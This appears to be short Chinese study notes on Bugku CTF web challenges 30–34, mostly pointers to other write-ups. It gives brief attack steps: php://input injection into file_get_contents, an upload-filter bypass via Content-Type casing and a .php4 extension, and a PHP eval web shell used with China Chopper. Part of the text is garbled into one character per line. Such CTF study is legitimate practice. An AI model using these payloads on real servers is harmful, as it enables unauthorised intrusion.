【说明】 整合资源 简略版本2020Bugku write up
web30
关键字: txt or file_get_contents(
f
n
)
知
识
点
:
f
i
l
e
g
e
t
c
o
n
t
e
n
t
s
(
fn) 知识点: file_get_contents(
fn)知识点:filegetcontents(fn) 联想 php://input
步骤:
1.1 可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容
2.1 根据提示 ?ac=bugku&fn=flag.txt
https://blog.csdn.net/baidu_39504221/article/details/111578802
web 31 好像需要管理员
构造 提示:/resusl.php?x=admin
步骤:1.抓包
- 打开发现代码 爆破密码passwd : admin
web 32 (无解)
关键字:
知识点:
步骤:头部Content-Type: multipart/form-data;中的multipart改成Multipart,即Content-Type: Multipart/form-data;,再将上传文件的后缀改成php4,最后再改改Content-Type: image/png
参考链接:https://blog.csdn.net/s11show_163/article/details/104585686
https://blog.csdn.net/EC_Carrot/article/details/111630819
知识点:https://blog.csdn.net/lilongsy/article/details/108149819
web 33
关键字: php加解密
https://blog.csdn.net/weixin_33682790/article/details/94573445
web 34
关键字: 中国菜刀 病毒脚本拿权限
知识点: view-source
步骤:
1.view-source发现 upload.php
2.一句话上传病毒 <?php phpinfo(); eval($_POST['test']); ?> 发现<?php ?>一头一尾被替换
3.修改为 上传
4.上传后成功绕过
5.首页右键添加 选择php脚本 填写test密码
6.在根目录里面找到flag
https://blog.csdn.net/baidu_39504221/article/details/111593339
未完待续